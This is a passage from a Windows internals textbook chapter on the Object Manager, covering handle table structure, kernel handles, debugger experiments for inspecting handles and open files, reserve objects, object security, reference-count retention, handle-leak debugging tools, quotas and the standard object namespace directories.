handles. (Click on View, Lower Pane View, and then Handles.) Then open a command prompt
and view the handle table for the new Cmd.exe process. You should see an open file handle to
the current directory. For example, assuming the current directory is C:\Users\Public, Process
Explorer shows the following:
Now pause Process Explorer by pressing the spacebar or selecting View, Update Speed
and choosing Pause. Then change the current directory with the cd command and press F5 to
refresh the display. You will see in Process Explorer that the handle to the previous current direc-
tory is closed, and a new handle is opened to the new current directory. The previous handle is
highlighted in red, and the new handle is highlighted in green.
This technique of pausing and refreshing can quickly show what handle or handles are being
opened but not closed. (Typically, you see a steadily rising handle count in a process with a
handle leak.) Resource Monitor also shows open handles to named handles for the processes
you select by checking the boxes next to their names.
You can also display the open handle table by using the command-line Handle tool from
Sysinternals. For example, note the following partial output of Handle examining the file
object handles located in the handle table for a Cmd.exe process before and after changing
the directory. By default, Handle shows only file and printer handles, unless the –a switch is used, which
displays all the handles in the process, similar to Process Explorer.
C:\Users\aione>\sysint\handle.exe -p 8768 -a users
Nthandle v4.22 - Handle viewer
Copyright (C) 1997-2019 Mark Russinovich
Sysinternals - www.sysinternals.com
cmd.exe            pid: 8768   type: File           150: C:\Users\Public
An object handle is an index into a process-specific handle table, pointed to by the executive process
(EPROCESS) block (described in Chapter 3 of Part 1). The index is multiplied by 4 (shifted 2 bits) to make
room for per-handle bits that certain API behaviors use; therefore, the first handle index
is 4, the second 8, and so on. Using handle 5, 6, or 7 simply redirects to the same object as handle 4,
while 9, 10, and 11 would reference the same object as handle 8.
A process's handle table contains pointers to all the objects that the process has opened
a handle to, and handle values are aggressively reused, such that the next new handle index will reuse
an existing closed handle index if possible. Handle tables are implemented as
a three-level scheme, similar to the way that the legacy x86 memory management unit implemented
virtual-to-physical address translation but with a cap of 24 bits for compatibility reasons, resulting in a
maximum of 16,777,215 (2^24 - 1) handles per process. Figure 8-33 describes the handle table
layout on Windows. To save on kernel memory costs, only the lowest-level handle table is allocated
on process creation—the other levels are created as needed. The subhandle table consists of as many
entries as will fit in a page, minus one entry that is used for handle auditing. For example, for 64-bit sys-
tems, a page is 4096 bytes, divided by the size of a handle table entry (16 bytes), which is 256, minus 1,
which is a total of 255 entries in the lowest-level handle table. The mid-level handle table contains a full
page of pointers to subhandle tables, so the number of subhandle tables depends on the size of the
page and the size of a pointer for the platform. Again using 64-bit systems as an example, this gives
us 4096/8, or 512 entries. Due to the cap of 24 bits, only 32 entries are allowed in the top-level pointer table.
[Figure content: a process points to its handle table, which consists of top-level pointers, middle-level pointers, and subhandle tables.]
FIGURE 8-33 Windows process handle table architecture.
EXPERIMENT: Creating the maximum number of handles
The test program Testlimit from Sysinternals has an option to open handles to an object until it
cannot open any more handles. You can use this to see how many handles can be created in a
single process on your system. Because handle tables are allocated from paged pool, you might
run out of paged pool before you hit the maximum number of handles that can be created in a
single process. To see how many handles you can create on your system, follow these steps:
1. Download the latest version of the Testlimit tool, which you can get if you
need from https://docs.microsoft.com/en-us/sysinternals/downloads/testlimit.
2. Run Process Explorer, click View, and then click System Information. Then click the
Memory tab. Notice the current and maximum size of paged pool. (To display the
maximum pool size, Process Explorer must be configured with access to the
symbols for the kernel image, Ntoskrnl.exe.) Leave this system information display run-
ning so that you can see pool utilization when you run the Testlimit program.
3. Open a command prompt.
4. Run the Testlimit program with the –h switch (do this by typing testlimit –h). When
Testlimit fails to open a new handle, it displays the total number of handles it was able
to create. If the number is less than approximately 16 million, you are probably running
out of paged pool before hitting the theoretical per-process handle limit.
5. Close the Command Prompt window; doing this kills the Testlimit process, thus closing
all the open handles.
Figure 8-34 shows the layout of a handle table entry on 32-bit systems. Each entry contains a pointer
to the object header, with three flags stored in its low bits (because
objects are 8-byte aligned, and these bits can be assumed to be 0), and the granted access mask (out of
which only 25 bits are needed, since generic rights are never stored in the handle entry) combined with
two more flags and the reference usage count, which we describe shortly.
[Figure content: a 32-bit pointer to the object header, whose low bits hold the A (Audit on close), I (Inheritable), and L (Lock) flags, alongside a 32-bit word containing the access mask plus the U (No Rights Upgrade), P (Protect from close), and Usage Count fields.]
FIGURE 8-34 Structure of a 32-bit handle table entry.
On 64-bit systems, the entry layout is similar but the fields are wider. For exam-
ple, 44 bits are now needed to encode the object pointer (assuming a processor with four-level paging
and 48 bits of virtual memory), since objects are 16-byte aligned, and thus the bottom four bits can
now be assumed to be 0. One difference is that the reference usage count is encoded in the remaining 16 bits next to
the pointer, instead of next to the access mask. Because only 25 bits of the access mask are needed, the remain-
ing 6 bits are spare, and there are still 32 bits of alignment that are also currently spare. On LA57 systems
with five levels of paging, the pointer must now be 53 bits, reducing the usage count bits to only 7.
Among the flags, the bottom bit is the lock bit; because a valid object pointer is stored in the entry, you
should expect the bottom bit to normally be set. The inheritance flag—that
is, it indicates whether processes created by this process will get a copy of this handle in their handle
tables—can be set with the SetHandleInformation function. The audit flag indicates whether closing
the handle should generate an audit message; the protect-from-close bit, which can also
be set with the SetHandleInformation function, indicates whether the caller is allowed to close this
handle; and the no-rights-upgrade bit indicates whether the handle's
access rights should be upgraded if the handle is duplicated to a process with higher privileges.
These flags are exposed through the OBJECT_HANDLE_INFORMATION structure
that is passed in to APIs such as ObReferenceObjectByHandle, and map to OBJ_INHERIT (0x2), OBJ_
AUDIT_OBJECT_CLOSE (0x4), OBJ_PROTECT_CLOSE (0x1), and OBJ_NO_RIGHTS_UPGRADE (0x8).
As mentioned, a reference usage count is stored in both the encoding of the pointer count field of
the object's header and in the handle table entry. This feature encodes a
cached number (based on the number of available bits) of preexisting references as part of each handle
entry and then adds up the usage counts of all processes that have a handle to the object into the
object's pointer count. As such, the pointer count is the sum of the number of handles, kernel refer-
ences through ObReferenceObject, and the number of cached references for each handle.
Each time a process uses a handle—essentially call-
ing any Windows API that takes a handle as input and ends up converting it into an object—the cached
number of references is dropped, which is to say that the usage count decreases by 1, until it reaches
0, at which point it is no longer tracked. This allows one to infer exactly the number of times a given
handle has been used. The debugger command !trueref, when executed with the -v flag, shows
each handle referencing an object and exactly how many times it was used.
System components and device drivers often need to open handles to objects that user-mode
applications shouldn't have access to, or that simply shouldn't be tied to a specific process to begin
with. This is done by creating handles in the kernel handle table (referenced internally with the name
ObpKernelHandleTable), which is associated with the System process. The handles in this table are ac-
cessible only from kernel mode and in any process context. This means that a kernel-mode function
can reference the handle in any process context with no performance impact.
The Object Manager recognizes references to handles from the kernel handle table when the high
bit of the handle is set—that is, when references to kernel-handle-table handles have values greater
than or equal to 0x80000000 on 32-bit systems (with the corresponding sign-extended value on 64-bit systems).
The kernel handle table also serves as the handle table for the System and minimal processes, and as
such, all handles created by the System process (such as code running in system threads) are implicitly ker-
nel handles because the ObpKernelHandleTable symbol is set as the ObjectTable of the EPROCESS structure
for these processes. Theoretically, this means that a sufficiently privileged user-mode process could use
the DuplicateHandle API to extract a kernel handle out into user mode, but this attack has been mitigated
since Windows Vista with the introduction of protected processes, which were described in Part 1.
Furthermore, as a security mitigation, any handle created by a kernel driver, with the previous mode
set to KernelMode, is automatically turned into a kernel handle in recent versions of Windows to pre-
vent handles from inadvertently leaking to user space applications.
EXPERIMENT: Viewing the handle table with the kernel debugger
The !handle command in the kernel debugger takes three arguments:
!handle <handle index> <flags> <processid>
For example, typing !handle 4 will display handle 4 for the current process. The flags argument
is a bitmask, where bit 0 means “display only the information in the
handle entry,” bit 1 means “display free handles (not just used handles),” and bit 2 means “display
information about the object that the handle refers to.” The following command displays full
details about the handle table for process ID 0x1540:
lkd> !handle 0 7 1540
PROCESS ffff898f239ac440
SessionId: 0 Cid: 1540 Peb: 1ae33d000 ParentCid: 03c0
DirBase: 211e1d000 ObjectTable: ffffc704b46dbd40 HandleCount: 641.
Image: com.docker.service
Handle table at ffffc704b46dbd40 with 641 entries in use
0004: Object: ffff898f239589e0 GrantedAccess: 001f0003 (Protected) (Inherit) Entry:
ffffc704b45ff010
Object: ffff898f239589e0 Type: (ffff898f032e2560) Event
ObjectHeader: ffff898f239589b0 (new version)
HandleCount: 1 PointerCount: 32766
0008: Object: ffff898f23869770 GrantedAccess: 00000804 (Audit) Entry: ffffc704b45ff020
Object: ffff898f23869770 Type: (ffff898f033f7220) EtwRegistration
ObjectHeader: ffff898f23869740 (new version)
HandleCount: 1 PointerCount: 32764
Instead of having to remember what all these bits mean, and convert process IDs to hexa-
decimal, you can also use the debugger data model to access handles through the Io.Handles
namespace of a process. For example, typing dx @$curprocess.Io.Handles[4] displays the first
handle for the current process, including the access rights and name, while the following com-
mand displays full details about the handles in PID 5440 (that is, 0x1540):
lkd> dx -r2 @$cursession.Processes[5440].Io.Handles
@$cursession.Processes[5440].Io.Handles
[0x4]
    Handle        : 0x4
    Type          : Event
    GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch | QueryState | ModifyState
    Object        [Type: _OBJECT_HEADER]
[0x8]
    Handle        : 0x8
    Type          : EtwRegistration
    GrantedAccess
    Object        [Type: _OBJECT_HEADER]
[0xc]
    Handle        : 0xc
    Type          : Event
    GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch | QueryState | ModifyState
    Object        [Type: _OBJECT_HEADER]
You can use the debugger data model with a LINQ predicate to perform more interesting
searches, such as looking for named section object mappings that are Read/Write:
lkd> dx @$cursession.Processes[5440].Io.Handles.Where(h => (h.Type == "Section") &&
(h.GrantedAccess.MapWrite) && (h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
@$cursession.Processes[5440].Io.Handles.Where(h => (h.Type == "Section") &&
(h.GrantedAccess.MapWrite) && (h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
[0x16c]
: "Cor_Private_IPCBlock_v4_5440"
[0x170]
: "Cor_SxSPublic_IPCBlock"
[0x354]
: "windows_shell_global_counters"
[0x3b8]
: "UrlZonesSM_DESKTOP-SVVLOTP$"
[0x680]
: "NLS_CodePage_1252_3_2_0_0"
EXPERIMENT: Searching for open files with the kernel debugger
Although you can use tools such as Process Explorer, Handle, and OpenFiles.exe to search for
open file handles, these tools are not available when looking at a crash dump or analyzing
a system remotely. You can instead use the !devhandles command to search for handles opened to
files on a specific volume:
1. First, pick the drive letter you are interested in and obtain the pointer to its
Device object. You can use the !object command as shown here:
lkd> !object \Global??\C:
Object: ffffc704ae684970 Type: (ffff898f03295a60) SymbolicLink
ObjectHeader: ffffc704ae684940 (new version)
HandleCount: 0 PointerCount: 1
Directory Object: ffffc704ade04ca0 Name: C:
Flags: 00000000 ( Local )
Target String is '\Device\HarddiskVolume3'
Drive Letter Index is 3 (C:)
2. Next, use the !object command to get the Device object of the target volume name:
1: kd> !object \Device\HarddiskVolume1
Object: FFFF898F0820D8F0 Type: (fffffa8000ca0750) Device
3. Now you can use the pointer of the Device object with the !devhandles command:
lkd> !devhandles 0xFFFF898F0820D8F0
Checking handle table for process 0xffff898f0327d300
Kernel handle table at ffffc704ade05580 with 7047 entries in use
PROCESS ffff898f0327d300
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 001ad000 ObjectTable: ffffc704ade05580 HandleCount: 7023.
Image: System
019c: Object: ffff898F080836a0 GrantedAccess: 0012019f (Protected) (Inherit)
(Audit) Entry: ffffc704ade28670
Object: ffff898F080836a0 Type: (ffff898f032f9820) File
ObjectHeader: ffff898F08083670 (new version)
HandleCount: 1 PointerCount: 32767
Directory Object: 00000000 Name: \$Extend\$RmMetadata\$TxfLog\
$TxfLog.blf {HarddiskVolume4}
Because !devhandles must walk every handle table in the system, it can take a long time to complete. You can
achieve the same effect with a LINQ predicate, which instantly starts returning results:
lkd> dx -r2 @$cursession.Processes.Select(p => p.Io.Handles.Where(h =>
h.Type == "File").Where(f => f.Object.UnderlyingObject.DeviceObject ==
(nt!_DEVICE_OBJECT*)0xFFFF898F0820D8F0).Select(f =>
f.Object.UnderlyingObject.FileName))
@$cursession.Processes.Select(p => p.Io.Handles.Where(h => h.Type == "File").
Where(f => f.Object.UnderlyingObject.DeviceObject == (nt!_DEVICE_OBJECT*)
0xFFFF898F0820D8F0).Select(f => f.Object.UnderlyingObject.FileName))
[0x0]
[0x19c] : "\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf" [Type: _UNICODE_STRING]
[0x2dc] : "\$Extend\$RmMetadata\$Txf:$I30:$INDEX_ALLOCATION" [Type: _UNICODE_STRING]
[0x2e0] : "\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002"
[Type: _UNICODE_STRING]
Reserve Objects
Because objects represent anything from events to files to interprocess messages, the ability for appli-
cations and kernel code to create objects is essential to the normal and desired runtime behavior of any
piece of Windows code. If an object allocation fails, this usually causes anything from loss of functional-
ity (the process cannot open a file) to data loss or crashes (the process cannot allocate a synchroniza-
tion object). Worse, in certain situations, the reporting of errors that led to object creation failure might
themselves require new objects to be allocated. Windows implements two special reserve objects to
deal with such situations: the User APC reserve object and the I/O Completion packet reserve object.
Note that the reserve-object mechanism is fully extensible, and future versions of Windows might add
other reserve object types—from a broad view, the reserve object is a mechanism enabling any kernel-
mode data structure to be wrapped as an object (with an associated handle, name, and security) for
later use.
As was discussed earlier in this chapter, APCs are used for operations such as suspension, termina-
tion, and I/O completion, as well as communication between user-mode applications that want to
provide asynchronous callbacks. When a user-mode application requests a User APC to be targeted
to another thread, it uses the QueueUserApc API in Kernel32.dll, which in turn calls the NtQueueApcThread
system call. In the kernel, this system call attempts to allocate a piece of paged pool in which to store
the KAPC control object structure associated with an APC. In low-memory situations, this operation
fails, preventing the delivery of the APC, which, depending on what the APC was used for, could cause
loss of data or functionality.
To prevent this, the user-mode application can, on startup, use the NtAllocateReserveObject system
call to request the kernel to preallocate the KAPC structure. Then the application uses a different sys-
tem call, NtQueueApcThreadEx, that contains an extra parameter that is used to store the handle to the
reserve object. Instead of allocating a new structure, the kernel attempts to acquire the reserve object
(by setting its InUse bit to true) and use it until the KAPC object is no longer needed, at which point
the reserve object is released back to the system. Currently, to prevent mismanagement of system
resources by third-party developers, the reserve object API is available only internally through system
calls for operating system components. For example, the RPC library uses reserve APC objects to
guarantee that asynchronous callbacks will still be able to return in low-memory situations.
A similar scenario can occur when applications need failure-free delivery of an I/O completion port
message or packet. Typically, packets are sent with the PostQueuedCompletionStatus API in Kernel32.
dll, which calls the NtSetIoCompletion API. Like the user APC, the kernel must allocate an I/O manager
structure to contain the completion-packet information, and if this allocation fails, the packet cannot
be created. With reserve objects, the application can use the NtAllocateReserveObject API on startup
to have the kernel preallocate the I/O completion packet, and the NtSetIoCompletionEx system call
can be used to supply a handle to this reserve object, guaranteeing a success path. Like the User
APC reserve objects, this functionality is reserved for system components and is used both by the RPC
library and the Windows Peer-To-Peer BranchCache service to guarantee completion of asynchronous
I/O operations.
Object security
When a process creates an object or opens a handle to an existing object, the process must specify a set of desired access rights—
that is, what it wants to do with the object. It can request either a set of standard access rights (such as
read, write, and execute) that apply to all object types, or specific access rights that vary depending on
the object type. For example, the process can request delete access or append access to a file object.
Similarly, it might require the ability to suspend or terminate a thread object.
When a process opens a handle to an object, the Object Manager calls the security reference moni-
tor, the kernel-mode portion of the security system, sending it the process's set of desired access rights.
The security reference monitor checks whether the object's security descriptor permits the type of
access the process is requesting. If it does, the reference monitor returns a set of granted access rights
that the process is allowed, and the Object Manager stores them in the object handle it creates. How
the security system determines who gets access to which objects is explored in Chapter 7 of Part 1.
Thereafter, whenever the process's threads use the handle through a service call, the Object
Manager can quickly check whether the set of granted access rights stored in the handle corresponds
to the usage implied by the object service the threads have called. For example, if the caller asked for
read access to a section object but then calls a service to write to it, the service fails.
EXPERIMENT: Looking at object security
You can look at the various permissions on an object by using either Process Hacker, Process
Explorer, WinObj, WinObjEx64, or AccessChk, which are all tools from Sysinternals or open-
source. The following list includes various ways to display the access control
list (ACL) for an object:
•  You can use WinObj or WinObjEx64 to navigate to any object on the system, including
object directories, right-click the object, and select Properties. For example, select the
BaseNamedObjects directory, select Properties, and click the Security tab. You should
see a dialog box like the one shown next. Because WinObjEx64 supports a wider variety of
object types, it can show this information for more objects. Typically, Everyone does not have
delete access to the directory, for example, but the SYSTEM account does (because this is where
session 0 services with SYSTEM privileges will store their objects).
•  Instead of using WinObj or WinObjEx64, you can view the handle table of a process using
Process Explorer, as shown in the experiment “Viewing open handles” earlier in this chapter,
or using Process Hacker, which has a similar view. Look at the handle table for the Explorer.exe
process; you should notice a Directory object handle to the per-session BaseNamedObjects
directory. (We describe the
per-session namespace shortly.) You can double-click the object handle and then click the
Security tab and see a similar dialog box (with more users and rights granted).
•  Finally, you can use AccessChk to query the security information of any object by using the
–o switch as shown in the following output. Note that using AccessChk will also show you
the integrity level of the object. (See Chapter 7 of Part 1, for more information on integrity
levels and the security reference monitor.)
C:\sysint>accesschk -o \Sessions\1\BaseNamedObjects
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
\Sessions\1\BaseNamedObjects
Type: Directory
RW Window Manager\DWM-1
RW NT AUTHORITY\SYSTEM
RW DESKTOP-SVVLOTP\aione
RW DESKTOP-SVVLOTP\aione-S-1-5-5-0-841005
RW BUILTIN\Administrators
R Everyone
NT AUTHORITY\RESTRICTED
Windows also supports Ex (Extended) versions of the APIs—CreateEventEx, CreateMutexEx,
CreateSemaphoreEx—that add another argument for specifying the access mask. This makes it possible
for applications to use discretionary access control lists (DACLs) to properly secure their objects without
breaking their ability to use the create object APIs to open a handle to them. You might be
wondering why a client application would not simply use OpenEvent, which does support a desired access
argument. Using the open object APIs leads to an inherent race condition when dealing with a failure
in the open call—that is, when the client application has attempted to open the event before it has
been created. In most applications of this kind, the open API is followed by a create API in the failure
case. Unfortunately, there is no guaranteed way to make this create operation atomic—in other words,
to occur only once.
Indeed, it would be possible for multiple threads and/or processes to have executed the create API
concurrently, and all attempt to create the event at the same time. This race condition and the extra
complexity required to try to handle it makes using the open object APIs an inappropriate solution
to the problem, which is why the Ex APIs should be used instead.
Object retention
There are two types of objects: temporary and permanent. Most objects are temporary—that is, they
remain while they are in use and are freed when they are no longer needed. Permanent objects remain
until they are explicitly freed. Because most objects are temporary, the rest of this section describes
how the Object Manager implements object retention—that is, retaining temporary objects only as
long as they are in use and then deleting them.
Because all user-mode processes that access an object must first open a handle to it, the Object
Manager can easily track how many of these processes, and which ones, are using an object. Tracking
these handles represents one part of implementing retention. The Object Manager implements object
retention in two phases. The first phase is called name retention, and it is controlled by the number
of open handles to an object that exists. Every time a process opens a handle to an object, the Object
Manager increments the open handle counter in the object's header. As processes finish using the
object and close their handles to it, the Object Manager decrements the open handle counter. When
the counter drops to 0, the Object Manager deletes the object's name from its global namespace. This
deletion prevents processes from opening a handle to the object.
The second phase of object retention is to stop retaining the objects themselves (that is, to delete
them) when they are no longer in use. Because operating system code usually accesses objects by us-
ing pointers instead of handles, the Object Manager must also record how many object pointers it has
dispensed to operating system processes. As we saw, it increments a reference count for an object each
time it gives out a pointer to the object, which is called the pointer count; when kernel-mode components
finish using the pointer, they call the Object Manager to decrement the reference count.
The system also increments the reference count when it increments the handle count, and likewise
decrements the reference count when the handle count decrements, because a handle is also a reference
to the object that must be tracked.
The Object Manager also maintains a third count, the usage reference count, which adds cached
references to the pointer count and is decremented each time a process uses a handle. The usage
reference count has been added since Windows 8 for performance reasons. When the kernel is asked
to obtain the object pointer from its handle, it can do the resolution without acquiring the global
handle table lock. This means that in newer versions of Windows, the handle table entry described in
the "Object handles and the process handle table" section earlier in this chapter contains a usage
reference counter, which is initialized the first time the handle is used. (Here the verb use refers
to the act of resolving the object pointer from its handle, an operation performed in the kernel by
APIs like ObReferenceObjectByHandle.)

Figure 8-35 shows an example. Process A creates the first named event, obtaining a handle to it. The
event has a name, which implies that the Object Manager inserts it in the correct directory object.
The first use of the handle charges its cached usage reference count against the object. (At this
point, the handle count is still 1.)
FIGURE 8-35 Handles and reference counts.
Process B initializes, creates the second named event, and signals it. The last operation uses (references)
the second event, allowing it also to reach a reference value of 32,770. Process B then opens the first
event by name, bringing that object's counters to 2 and 32,771. (Remember, the new handle table entry still
has its usage reference count uninitialized.) The first time Process B uses its handle, the system
initializes the entry's usage reference count to 32,767. The value is added to the object reference count,
which is further increased by 1 unit, and reaches the overall value of 65,539. Subsequent operations on the
handle simply decrease the usage reference count without touching the object's reference count. Closing
the handle is different, though—an operation that releases a reference count on the kernel object. (Thus,
after a few uses of the handle, the counters settle at the values shown in Figure 8-35.)

When a process closes a handle to an object (an operation that causes the NtClose routine to be
executed in the kernel), the Object Manager knows that it needs to subtract the remaining handle usage
reference count, in addition to the handle's own reference, from the object. If, for example, both
processes closed their handles to the first event, the object would continue to exist because a
kernel-mode structure still holds a pointer to it: its reference count will become 1 (while its handle
count would be 0). However, when Process B closes its handle to the second event object, the object
would be deallocated, because its reference count reaches 0.
Even after an object's open handle counter reaches 0, the object's reference count might remain
positive, indicating that the operating system is still using the object in some way. Ultimately, it is
only when the reference count drops to 0 that the Object Manager deletes the object from memory. This
deletion has to respect certain rules and, in some cases, requires cooperation from the caller. Because
objects can be allocated from paged or nonpaged pool memory (depending on the settings located in their
object types), if a dereference occurs at an IRQL level of DISPATCH_LEVEL or higher and this dereference
causes the pointer count to drop to 0, the system would crash if it attempted to immediately free the
memory of a paged-pool object. (Recall that such access is illegal because the page fault will never be
serviced.) In this scenario, the Object Manager performs a deferred delete operation, queuing the
operation on a worker thread running at passive level (IRQL 0). Deferred deletion also helps when a
driver holds a lock that the deletion path itself needs: attempting to delete the object will result in
the system attempting to acquire this lock, deadlocking against the driver. In such cases, driver
developers must use ObDereferenceObjectDeferDelete to force deferred deletion regardless of IRQL.
Finally, the I/O manager also uses this mechanism as an optimization so that certain I/Os can
complete more quickly, instead of waiting for the Object Manager to delete the object.
Because of the way object retention works, an application can ensure that an object and its name
remain in memory simply by keeping a handle open to the object. Programmers who write applications
that contain two or more cooperating processes need not be concerned that one process might delete an
object before the other process has finished using it. For example, one process might create a second
process to execute a program in the background; it then immediately closes its handle to the process.
Because the operating system needs the second process to run the program, it maintains a reference to
its process object and deletes the object only when the background program finishes executing.
Because object leaks can be dangerous to the system by leaking kernel pool memory and eventu-
ally causing systemwide memory starvation—and can break applications in subtle ways—Windows
includes a number of debugging mechanisms that can be enabled to monitor, analyze, and debug
issues with handles and objects. Additionally, WinDbg comes with two extensions that tap into these
mechanisms and provide easy graphical analysis. Table 8-24 describes them.
TABLE 8-24 Debugging mechanisms for object handles

Mechanism: Handle Tracing Database
  Enabled by: Kernel Stack Trace systemwide and/or per-process, with the User Stack Trace
  option checked, with Gflags.exe
  Kernel debugger extension: !htrace <handle value> <process ID>

Mechanism: Object Reference Tracing
  Enabled by: Per-process-name(s), or per-object-type-pool-tag(s), with Gflags.exe
  Kernel debugger extension: !obtrace <object pointer>

Mechanism: Object Reference Tagging
  Enabled by: Drivers must call the appropriate API
  Kernel debugger extension: N/A
Enabling the handle-tracing database is useful when attempting to understand the use of each
handle within an application or the system context. The !htrace debugger extension can display the
stack trace captured at the time a specified handle was opened. After you discover a handle leak,
the stack trace can pinpoint the code that is creating the handle, and it can be analyzed for a missing
call to a function such as CloseHandle.
The object-reference-tracing !obtrace extension monitors even more by showing the stack trace for
each new handle created as well as each time a handle is referenced by the kernel (and each time it is
opened, duplicated, or inherited) and dereferenced. By analyzing these patterns, misuse of an object
at the system level can be more easily debugged. Additionally, these reference traces provide a way to
understand the behavior of the system when dealing with certain objects. Tracing processes, for
example, displays references from all the drivers on the system that have registered callback
notifications (such as Process Monitor) and helps detect rogue or buggy third-party drivers that might be referencing
handles in kernel mode but never dereferencing them.
Note  You can find the name of an object type's pool tag by looking at the Key member of
the OBJECT_TYPE structure when using the dx command. Each object type on the system has a
global variable that references this structure—for example, PsProcessType. Alternatively,
you can use the !object command, which displays the pointer to this structure.
Unlike the previous two mechanisms, object-reference tagging is not a debugging feature that must
be enabled; rather, it is a set of APIs that should be used by device-driver developers to reference
and dereference objects, including ObReferenceObjectWithTag and
ObDereferenceObjectWithTag. Similar to pool tagging (see Chapter 5 in Part 1 for more information on pool
tagging), these APIs allow developers to supply a four-character tag identifying each reference/dereference
pair. When using the !obtrace extension just described, the tag for each reference or dereference operation
is also shown, which avoids solely using the call stack as a mechanism to identify where leaks or under-
references might occur, especially if a given call is performed thousands of times by the driver.
Resource accounting
Resource accounting, like object retention, is closely related to the use of object handles. A positive
open handle count indicates that some process is using that resource. It also indicates that some
process is being charged for the memory the object occupies. When an object's handle count and
reference count drop to 0, the process that was using the object should no longer be charged for it.

Many operating systems use a quota system to limit processes' access to system resources. However,
the types of quotas imposed on processes are sometimes diverse and complicated, and the code to
track the quotas is spread throughout the operating system. For example, a process component might
limit users to some maximum number of new processes they can create or a maximum number of threads
within a process. Each of these limits is tracked and enforced in different parts of the operating
system.

In contrast, the Windows Object Manager provides a central facility for resource accounting. Each
object header contains an attribute called quota charges that records how much the Object Manager
subtracts from a process's allotted paged and/or nonpaged pool quota when a thread in the process
opens a handle to the object.

Each process on Windows points to a quota structure that records the limits and current values for
nonpaged-pool, paged-pool, and paging-file usage. (These limits can be specified with the
NonPagedPoolQuota, PagedPoolQuota, and PagingFileQuota registry values under
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management.) Note that all the
processes in an interactive session share the same quota block (and thus the same limits).
Object names
An important consideration in creating a multitude of objects is the need to devise a successful system
for keeping track of them. The Object Manager requires the following information to help you do so:
• A way to distinguish one object from another
• A method for finding and retrieving a particular object

Object names satisfy the first requirement. Most operating systems provide the ability to name
selected resources—files, pipes, or a block of shared memory, for example. The executive, in
contrast, allows any resource represented by an object to have a name.

Object names also satisfy a third requirement, which is to allow processes to share objects. The
executive's object namespace is global, visible to all processes in the system: one process can
create an object and place its name in the global namespace, and a second process can open a handle
to the object by specifying the object's name.

The Object Manager looks up a name at two points. The first is when a process creates a named
object: the Object Manager verifies that the name doesn't already exist before storing the new name
in the global namespace. The second is when a process opens a handle to a named object: the Object
Manager finds the object by name and returns an object handle to the caller; thereafter, the caller
uses the handle to refer to the object. When looking up a name, the Object Manager allows the caller
to select either a case-sensitive or case-insensitive search, a feature that supports Windows
Subsystem for Linux (WSL) and other environments that use case-sensitive file names.
Object directories
The object directory object is the Object Manager's means for supporting this hierarchical naming
structure. This object is analogous to a file system directory and contains the names of other objects,
possibly even other object directories. The object directory object maintains enough information to
translate these object names into pointers to the object headers of the objects themselves. The Object
Manager uses the pointers to construct the object handles that it returns to user-mode callers. Both
kernel-mode code (including executive components and device drivers) and user-mode code (such as
subsystems) can create object directories in which to store objects.

Objects can be stored anywhere in the namespace, but certain object types will always appear in
certain directories. For example, because the I/O manager is the only component responsible for the
creation of Driver objects (through the IoCreateDriver API), only Driver objects should exist there.
Table 8-25 lists the standard object directories found on all Windows systems and what types of
object names are stored there. Of these directories, only a few are visible to regular user applications
that stick to documented APIs. (See the "Session namespace" section later in this chapter for
more information.)
TABLE 8-25 Standard object directories

\AppContainerNamedObjects — Contains the named kernel objects created by Win32 or UWP APIs from
within processes that are running in an App Container.

\ArcName — Symbolic links mapping ARC-style paths to NT-style paths.

\BaseNamedObjects — Global mutexes, events, semaphores, waitable timers, jobs, ALPC ports, symbolic
links, and section objects.

\Callback — Callback objects (which only drivers can create).

\Device — Device objects, plus symbolic links such as SystemPartition and BootPartition. Also
contains the PhysicalMemory section object, driver-specific directories such as Http used by the
Http.sys accelerator driver, and HarddiskN directories for each physical hard drive.

\Driver — Driver objects whose type is not a file-system driver or file-system recognizer
(SERVICE_FILE_SYSTEM_DRIVER or SERVICE_RECOGNIZER_DRIVER).

\DriverStore(s) — Symbolic links for locations where OS drivers can be installed and managed from.
Also used by Windows 10X devices.

\FileSystem — File-system driver objects (SERVICE_FILE_SYSTEM_DRIVER) and file-system-recognizer
(SERVICE_RECOGNIZER_DRIVER) driver and device objects.

\KernelObjects — Contains event objects that signal kernel pool resource conditions, the completion
of certain operating system tasks, as well as Session objects (at least Session0) representing each
interactive session, and Partition objects (at least MemoryPartition0) for each memory partition.
Also contains the mutex used to synchronize access to the Boot Configuration Database, and dynamic
symbolic links that use a callback to refer to the correct partition for physical memory and commit
resource conditions, and for memory error detection.

\KnownDlls — Section objects for the known DLLs mapped by SMSS at startup time, and a symbolic
link containing the path for known DLLs.

\KnownDlls32 — On 64-bit Windows, this directory is used instead to store WoW64 32-bit versions of
those DLLs.

\NLS — Section objects for mapped national language support (NLS) tables.

\ObjectTypes — Object type objects for each object type created by ObCreateObjectTypeEx.

\RPC Control — ALPC ports created to represent remote procedure call (RPC) endpoints when Local RPC
(ncalrpc) is used. This includes explicitly named endpoints, as well as auto-generated
COM (OLEXXXXX) port names and unnamed ports (LRPC-XXXX, where XXXX is a randomly generated
hexadecimal value).

\Sessions — Per-session namespace directory. (See the next subsection.)

\Silo — If at least one Windows Server Container has been created, such as by using Docker for
Windows, contains object directories for each Silo (named after the ID of the root job for the
container), which then contain the object namespace local to that Silo.

\VmSharedMemory — Section objects used by virtualized instances (VAIL) of Win32k.sys and other
window manager components on Windows 10X devices when launching legacy Win32 applications. Also
contains the Host object directory to represent the other side of the connection.

\Windows — Windows subsystem ALPC ports, shared section, and window stations in the
WindowStations object directory. Desktop Window Manager (DWM) also stores its ALPC ports, events,
and shared sections in this directory, for non-Session 0 sessions.
Object names are global to a single computer (or to all processors on a multiprocessor computer), but
they're not visible across a network. However, the Object Manager's parse method makes it possible to
access named objects that exist on other computers: the I/O manager extends object services to remote
files, and server code on the remote Windows system calls the Object Manager and the I/O manager on
that system to find the object and return the information back across the network.

Because the kernel objects created by non-app-container processes, through the Win32 and UWP API,
such as mutexes, events, semaphores, waitable timers, and sections, have their names stored in a single
object directory, no two of these objects can have the same name, even if they are of a different type.
This restriction emphasizes the need to choose names carefully so that they don't collide with names
used by other applications.
The issue with name collision may seem innocuous, but one security consideration to keep in mind
